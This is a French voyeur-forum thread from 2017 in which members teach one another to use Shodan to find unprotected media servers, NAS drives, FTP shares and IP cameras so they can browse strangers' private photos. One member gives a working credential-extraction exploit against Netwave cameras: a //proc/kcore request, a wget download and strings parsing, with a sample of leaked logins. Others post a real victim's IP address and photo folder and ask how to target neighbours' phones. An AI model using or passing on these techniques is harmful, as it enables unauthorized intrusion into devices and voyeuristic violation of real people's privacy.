Aller au contenu


Accès au vidéos, téléchargements, messages privés et à toutes les sections et aucune pub ?
Créez un compte et Devenez membre VIP


Photo
* * * * * 1 note(s)

Comment utiliser shodan


  • Veuillez vous connecter pour répondre
45 réponses à ce sujet

Comment utiliser shodan #1 Renault63

Renault63

    Advanced Member

  • Members
  • PipPipPip
  • 155 messages
  • Voyeur Score : 2
  • VS Accumulé: 274
  • LocationAuvergne issoire

Posté 17 juin 2017 - 04:36

Je me suis inscrit mais je ne comprends pas comment l utilisé quelqu un peut il m expliquer merci

Comment utiliser shodan #2 Jondo

Jondo

    Advanced Member

  • Members
  • PipPipPip
  • 52 messages
  • Voyeur Score : 13
  • VS Accumulé: 1076

Posté 17 juin 2017 - 09:03

Salut,

Je ne suis pas un pro, mais je peux t'expliquer comment je l'utilise...
Je recherche principalement des squeezebox car les utilisateurs oublient souvent que la page de configuration est accessible à distance par défaut.

Donc dans la barre de recherche de Shodan je mets : Logitech Media Server

Et comme tu peux voir sur les photos ci-jointes, je trouve 4509 résultats.

Un compte gratuit sur Shodan ne permet pas une recherche au delà de 5 pages, il faut donc filtrer les résultats.

Pour ça tu as un certain nombre de mots clés comme par exemple :
Country pour limiter à un pays.
Port pour limiter à un port précis (dans notre cas, les ports 9000, 9001, 9002 et 9003)
Before et after pour préciser les dates de scans

 

Ma recherche devient donc : "Logitech Media Server" country:"FR"

 

Il me reste encore 410 résultats donc j'affine encore en ajoutant le code 200 pour ne garder que les serveurs qui sont OK, le port 9002 et after:"15/06/2017"

 

Ma recherche devient donc : Logitech Media Server" country:"FR" port"9002" after:"15/06/2017" "200 OK"

 

Et voilà 33 résultats.

 

J'ouvre le premier en faisant un clic droit sur l'adresse IP (ouvrir dans un nouvel onglet)

Selon la version du serveur et le choix de l'utilisateur, l'interface peut changer (je t'ai mis deux exemples) mais ce qu'il faut rechercher c'est le plugin Picture Gallery.
C'est lui qui va te donner accès aux photos.

 

Il n'est pas toujours disponible, si tu ne le trouves pas passe à une autre IP.

 

Lorsque tu auras visité les 33 résultats, tu pourras passer aux ports suivants...

 

Voilà une première approche, il existe pleins d'autres possibilités que tu découvriras au fur et à mesure.

Bonne chasse !

Fichier(s) joint(s)

  • Fichier joint  Shodan-05.jpg   61,02 Ko   2577 téléchargement(s)
  • Fichier joint  Shodan-04.jpg   89,46 Ko   2563 téléchargement(s)
  • Fichier joint  Shodan-03.jpg   89,73 Ko   2525 téléchargement(s)
  • Fichier joint  Shodan-02.jpg   92,38 Ko   2497 téléchargement(s)
  • Fichier joint  Shodan-01.jpg   104,3 Ko   2484 téléchargement(s)
  • Fichier joint  Shodan-06.jpg   61,81 Ko   2460 téléchargement(s)


Modifié par Jondo, 17 juin 2017 - 09:17 .


Comment utiliser shodan #3 Renault63

Renault63

    Advanced Member

  • Members
  • PipPipPip
  • 155 messages
  • Voyeur Score : 2
  • VS Accumulé: 274
  • LocationAuvergne issoire

Posté 19 juin 2017 - 07:01

Bjr je te remercie pour se petit cour

Modifié par Renault63, 19 juin 2017 - 07:02 .


Comment utiliser shodan #4 piloupsg57

piloupsg57

    Member

  • Members
  • PipPip
  • 11 messages
  • Voyeur Score : 1
  • VS Accumulé: 5

Posté 20 juin 2017 - 07:46

Salut, merci pour le tuto.

 

As tu d'autres serveur que logitech à communiquer?

 

Merci



Comment utiliser shodan #5 Renault63

Renault63

    Advanced Member

  • Members
  • PipPipPip
  • 155 messages
  • Voyeur Score : 2
  • VS Accumulé: 274
  • LocationAuvergne issoire

Posté 20 juin 2017 - 09:51

Bjr la même chose que piloupsg57 merci

Comment utiliser shodan #6 Jondo

Jondo

    Advanced Member

  • Members
  • PipPipPip
  • 52 messages
  • Voyeur Score : 13
  • VS Accumulé: 1076

Posté 20 juin 2017 - 12:19

Oui, vous pouvez essayer :   Set-Cookie: iomega=    pour trouver des NAS Iomega non protégés

 

"ASUS " 230  pour trouver des serveurs FTP non protégés

 

Netwave IP Camera pour trouver des webcam et ensuite utiliser //proc/kcore pour extraire le login et le mot de passe.

 

Vous pouvez aussi faire un tour sur la page "Explore" pour voir les recherches les plus courantes...



Comment utiliser shodan #7 Renault63

Renault63

    Advanced Member

  • Members
  • PipPipPip
  • 155 messages
  • Voyeur Score : 2
  • VS Accumulé: 274
  • LocationAuvergne issoire

Posté 21 juin 2017 - 05:56

Bjr je ne comprends pas pour les autres serveurs la marche à suivre merci

Comment utiliser shodan #8 Jondo

Jondo

    Advanced Member

  • Members
  • PipPipPip
  • 52 messages
  • Voyeur Score : 13
  • VS Accumulé: 1076

Posté 22 juin 2017 - 10:08

Bonjour,

 

Pour IOMEGA, la procédure est sensiblement identique à celle utilisée pour les serveurs Logitech. 
Depuis la page de résultats de Shodan (screen 1), on se connecte au NAS.  Si le serveur est en HTTPS, un message d'avertissement peu apparaitre (screen 2).
Il suffit d'ajouter une exception de sécurité depuis le bouton "avancé" sans la rendre permanente (screen 3 et 4). Ensuite si l'on a de la chance, les partages sont accessibles depuis la page "SOMMAIRE" (screen 5) et en cliquant sur un répertoire un gestionnaire de fichiers s'ouvre (screen 6).

A la différence de Logitech, ici tous les fichiers sont accessibles et pas simplement les photos ou les vidéos.

 

Pour les serveurs ASUS, c'est un peu plus compliqué, il faut passer par un client FTP (ex: filezilla) qui va nous emmener directement dans les répertoires du NAS qui sont accessibles à un utilisateur anonyme. Il n'y a pas de miniatures qui permettraient de sélectionner les photos, il faut donc procéder par sondage en chargeant quelques photos par-ci par-là ...

 

 

 

 

Fichier(s) joint(s)

  • Fichier joint  Iomega-01.jpg   71,18 Ko   2161 téléchargement(s)
  • Fichier joint  Iomega-02.jpg   32,52 Ko   2144 téléchargement(s)
  • Fichier joint  Iomega-03.jpg   42,96 Ko   2133 téléchargement(s)
  • Fichier joint  Iomega-04.jpg   73,78 Ko   2129 téléchargement(s)
  • Fichier joint  Iomega-05.jpg   26,42 Ko   2111 téléchargement(s)
  • Fichier joint  Iomega-06.jpg   32 Ko   2081 téléchargement(s)



Comment utiliser shodan #9 aldum0

aldum0

    Member

  • Members
  • PipPip
  • 12 messages
  • Voyeur Score : 0
  • VS Accumulé: 8

Posté 23 juin 2017 - 05:45

bonjour est ce possible de voir les photos de personnes qu'on connait a partir de leur adresse ip ou autre ?



Comment utiliser shodan #10 inod270

inod270

    Advanced Member

  • Members
  • PipPipPip
  • 298 messages
  • Voyeur Score : 0
  • VS Accumulé: 659

Posté 25 juin 2017 - 01:30

Merci pour les tutos

Comment utiliser shodan #11 inod270

inod270

    Advanced Member

  • Members
  • PipPipPip
  • 298 messages
  • Voyeur Score : 0
  • VS Accumulé: 659

Posté 28 juin 2017 - 05:19

Je n'arrive pas à avoir les mots de passe des cams avec ta technique. Comment faut-il faire exactement ?

Comment utiliser shodan #12 Jondo

Jondo

    Advanced Member

  • Members
  • PipPipPip
  • 52 messages
  • Voyeur Score : 13
  • VS Accumulé: 1076

Posté 29 juin 2017 - 02:55

Je n'arrive pas à avoir les mots de passe des cams avec ta technique. Comment faut-il faire exactement ?

 

Sur une webcam vulnérable en ajoutant //proc/kcore derrière l'adresse IP on génére un vidage mémoire qui ressemble un peu à ça dans un navigateur web:

ELF(44 tx”CORE|CORERvmlinuxroot=/dev/rom0 rwhCORE@Èsÿÿÿÿ ¡üÿÿÿÿ< å<@þ¶F`ç ç ¡üT@çT@çô‚!èè`ç ç¨@ç¨@ç8u¸@ç¸@ç@çÍ$Ñ3ÿþÿÿÿþÿÿ`vÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ>ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ€€ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿcamera^çà±ü@ý2ÿ€Úÿ€8Cç°Ðá€ãüÿÿ ° Àá ãð áå€â‘å€ÀãPá #@ 3ð á@-é€4€ã áÀƒà@à ãê°àÀá° Ñá° Àá° Ðá€ãüÿÿ â€â\áõÿÿŠàã°ÃáÍë 〽è@-éGå(Ÿå€€ã@ã  ã0 á‘å ‚À€à@ËLâ°àÜá‚À á¼àá ‚â€Rã0àöÿÿ:ê‚À€à@ËŒâ°àÜá‚À á¼àá ‚â€Rã0àöÿÿ:  ã° ÀáР ã° Àá° Ðá€ãüÿÿ °

 

A partir de là il faut utiliser un logiciel de téléchargement. Sous linux, j'utilise wget:

wget adresseIP:port//proc/kcore

Il faut que le fichier kcore atteigne au-moins la taille de 4Mo pour espérer trouver le mot de passe et

le téléchargement ne va jamais au-delà de 3mn, donc si tu ne charges pas au-moins à 40KB/s c'est pas la peine de continuer.

 

Ensuite, toujours sous linux, je convertis le fichier kcore en fichier txt

strings kcore >> kcore.txt

Et là, avec un éditeur de texte, je recherche : time.nist.gov

 

En général vers la fin du fichier txt, je trouve le login et le mot de passe comme ici par exemple:

user.ipcam.hk
admin
time.nist.gov
user.ipcam.hk
uwkr
148928
dns.camcctv.com
Dipcamera.cdlxkj.com
cdlxkj
test
test
00B002002B62
admin
1966

yopyop
1966110404
time.nist.gov
user.ipcam.hk
uwkr
148928
dns.camcctv.com
 



Comment utiliser shodan #13 inod270

inod270

    Advanced Member

  • Members
  • PipPipPip
  • 298 messages
  • Voyeur Score : 0
  • VS Accumulé: 659

Posté 29 juin 2017 - 04:38

Merci pour te réponse ça me parait compliqué tout ça lol

Comment utiliser shodan #14 Jondo

Jondo

    Advanced Member

  • Members
  • PipPipPip
  • 52 messages
  • Voyeur Score : 13
  • VS Accumulé: 1076

Posté 29 juin 2017 - 11:50

Oui, c'est un peu plus technique que la recherche de photos sur les NAS mais ça reste accessible.

 

La démarche est assez facilement compréhensible, les logins, mots de passe et autres variables de configurations existent dans la mémoire de la caméra.  La commande //proc/kcore provoque un dump de cette mémoire dans un fichier kcore qui peut atteindre 16Mo.  En général les variables qui nous intéressent se situent autour de 4Mo.  Le fichier étant hexadécimal, pour le lire plus facilement, il faut extraire les chaines de caractères (la commande strings).

 

Je ne sais pas pour qu'elle raison mais au bout de 3mn, le téléchargement s’interrompt systématiquement. Par conséquent, plus la vitesse de téléchargement sera élevée et plus la chance de récupérer 4Mo (et donc les variables login et pass) en 3mn sera grande.

 

Perso si la vitesse de chargement n’atteint pas 40Kb/s, je ne continue pas. Trop peu de chance de trouver un mot de passe.

 

Reste les outils à employer, wget et strings sous linux me vont bien mais il existe surement des équivalent windows.



Comment utiliser shodan #15 inod270

inod270

    Advanced Member

  • Members
  • PipPipPip
  • 298 messages
  • Voyeur Score : 0
  • VS Accumulé: 659

Posté 29 juin 2017 - 02:20

Oui moi je suis sous windows...

Comment utiliser shodan #16 Darkman62000

Darkman62000

    Advanced Member

  • Members
  • PipPipPip
  • 237 messages
  • Voyeur Score : 252
  • VS Accumulé: 2405
  • LocationFrance

Posté 08 juillet 2017 - 11:20

Merci pour toutes ces ingos sur plein de trucs que je conaissais pas !

C'est quand meme ouf de se dire que les gens ne se rendent pas compte que tout est open comme ca !!

 

Et petite question (peut etre posé deja, mais j'ai pas vu), mais on risque quoi à fouiller comme cela?


post-37904-0-51810300-1500242101_thumb.p

 


Comment utiliser shodan #17 TomVoyeur

TomVoyeur

    Newbie

  • Members
  • Pip
  • 1 messages
  • Voyeur Score : 0
  • VS Accumulé: 1

Posté 11 juillet 2017 - 12:20

Merci beaucoup pour ce tuto! Je ne connaissais pas cette "faille de sécurité" ou plutôt méconnaissance des utilisateurs et surtout Shodan qui facilite grandement la recherche.

 

Reste à travailler sa patience et naviguer dans les dossiers à la recherche de contenu intéressant... Qui se limite à quelques photos en lingerie pour l'instant, pour ma part! :)



Comment utiliser shodan #18 lougarou29

lougarou29

    Newbie

  • Members
  • Pip
  • 9 messages
  • Voyeur Score : 0
  • VS Accumulé: 5

Posté 11 juillet 2017 - 12:24

C'est vraiment un juet fabuleux... qui me coute quelques heures de sommeil... au delà de trouver du nu, voire plus, je trouve ça grisant de fouiller dans la vie des gens... pfiou...

 

Tenez, voilà une trouvaille

La requête   "Logitech Media Server" country:"CH"

L'IP concernée  : http://178.196.94.66:9002/

Le répertoire fun: inicio/gallery/volume1/horba

 

 

Ca vaut presque le coup d'ouvrir un post dédié...

 

Par contre n'étant pas très fort en langage informatique, ne serait il pas judicieux de fournir des listings de noms de serveur... parce que logitech ne doit pas être le seul...

 

Et éventuellement des listing d'options (les pays, c'est facile...)

 

 

Autre question: est ilpossible avec ce jouet, de "cibler" une IP particulière.... de cibler une région ou une ville particulière (mes voisins...lol)... de passer "a travers " une box (qui a déjà elle même une iP)...

 

Je n'ai pas encore attaqué les caméras... mais il faut que je garde quelques heures de sommeil ;-)

 

Sortez couverts ...

 



Comment utiliser shodan #19 niamor6901

niamor6901

    Member

  • Members
  • PipPip
  • 15 messages
  • Voyeur Score : 1
  • VS Accumulé: 153
  • LocationBelgique

Posté 11 juillet 2017 - 12:41

 

Tenez, voilà une trouvaille

La requête   "Logitech Media Server" country:"CH"

 

 

 

Je l'avais trouvé dans ma nuit de recherche celui la. J'ai même pu mettre la main sur quelques vidéos

Fichier(s) joint(s)




Comment utiliser shodan #20 lougarou29

lougarou29

    Newbie

  • Members
  • Pip
  • 9 messages
  • Voyeur Score : 0
  • VS Accumulé: 5

Posté 11 juillet 2017 - 02:07

Justement, en regardant les différents posts sur shodan, je vois que nous tombons tous sur les mêmes, alors qu'en théorie, nous avons le monde à notre disposition....

 

Dans la liste des questions, est ce qu'on peut attaquer spécifiquement des téléphones portables... avec la vie connectée des gens, je suis certain que 90% des photos coquines sont faites avec des tel actuellement.... ça vaudrait le coup de cibler ce genre d'engin...

 

A partir du moment ou un tel se connecte sur votre wifi (copain/copine qui vient à la maison) vous avez son IP.... on en fait quoi après ???




Accès au vidéos, téléchargements, messages privés et à toutes les sections et aucune pub ?
Créez un compte et Devenez membre VIP